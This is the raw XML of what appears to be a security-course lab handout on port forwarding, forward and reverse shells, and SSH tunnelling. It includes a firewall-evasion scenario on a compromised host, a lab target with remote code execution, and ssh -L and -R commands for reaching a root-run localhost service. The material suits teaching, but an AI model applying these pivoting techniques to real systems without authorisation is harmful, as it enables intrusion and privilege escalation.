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f84vi6aqmry"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Forward / Reverse Port Forward</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contextualSpacing w:val="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5" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="short line" id="0" name="image28.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Goals</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Preparation</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rFonts w:ascii="Proxima Nova" w:cs="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is Reverse Shell?</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Use Cases</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before="200" w:line="300" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS Lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_skn3e6m28u4k" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Goals</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Learn about Forward Shell &amp; Reverse Shell</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Exploit some systems with reverse shell &amp; forward shell</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Understand in network layer how this works</w:t>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6hgqe4dzrinp" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Preparation</w:t>
      </w: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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali VM</w:t>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OpenVPN set up in AWS VPC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Be able to log into VPN on your kali VM</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="505050"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_farz3sy86qj0" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Forwarding</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Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="144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When do we use Port Forwarding?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">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Port Forwarding is typically used when you want to expose certain service to public network. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2933700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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Above example shows how you can expose a website at your home network. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have a router at home, try and log into the router, and configure port forwarding to expose a service to see if it actually works!</w:t>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color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another Port Forwarding example</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5857875" cy="4648200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="11"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85787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9"/>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Scenario: you have compromised a remote computer, but there is a firewall that ONLY allows port 53 outbound. Thus, you cannot browse any websites on port 80 or 443. You can bypass this with Port Forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5629275" cy="4305300"/>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6292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1"/>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Using your own machine to attack, you can create a Port Forward on port 53 to access a web server that you wanted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then from the compromised machine under firewall, you can connect to port 53 to your own machine which will redirect your traffic to the web server. </w:t>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35ty1r6z2p84" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001E">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking Lab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Log into Security Lab with Openvpn</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Target IP : 10.11.1.95</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal: Two websites are running in this computer. Find the flag in root directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Both with RCE (Remote Code Execution) available for you guys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000023">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One is open to local network and is ran by a limited user (info341)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other is open to only localhost and is ran by a root user (root)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TIPS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000026">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you are using a tool that requires shell interaction such as ssh or ftp, simply reverse shell may not have tty in the shell. If you want to be able to interact with certain tools in shell, you need to spawn tty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://netsec.ws/?p=337</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Port forwarding</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PORT FORWARD Attacking examples (ACCESS LOCAL SERVICE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002A">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -L 2222:localhost:9090 -N -f -T -o student@localhost   (required login credential of local machine)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port forwarding is normally used when you want to expose a private service to public.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">English</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From localhost on student account, forward anything coming to localhost:2222 to localhost:9090</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This essentially exposes a ONLY localhost service on port 9090 to public port 2222</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse Port Forward</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030">
      <w:pPr>
        <w:contextualSpacing w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -R 2222:localhost:9090 -N -f -T -o user@10.11.0.32   (not required to have login credential of local machine. But need login credential of remote machine (most likely your attacking machine))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000031">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">English</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From 10.11.0.32 on port 2222, send all traffic through the ssh tunnel created and forward that traffic to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost:9090</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033">
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="494949"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:color w:val="494949"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-f:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="494949"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tells the SSH to background itself after it authenticates, saving you time by not having to run something on the remote server for the tunnel to remain alive.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="160" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:color w:val="494949"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-N:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="494949"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> if all you need is to create a tunnel without running any remote commands then include this option to save resources.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:contextualSpacing w:val="1"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:color w:val="494949"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-T:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="494949"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> useful to disable pseudo-tty allocation, which is fitting if you are not trying to create an interactive shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000036">
      <w:pPr>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="494949"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000037">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="494949"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r00j43vzmkr1" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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038">
      <w:pPr>
        <w:spacing w:before="0" w:lineRule="auto"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="494949"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
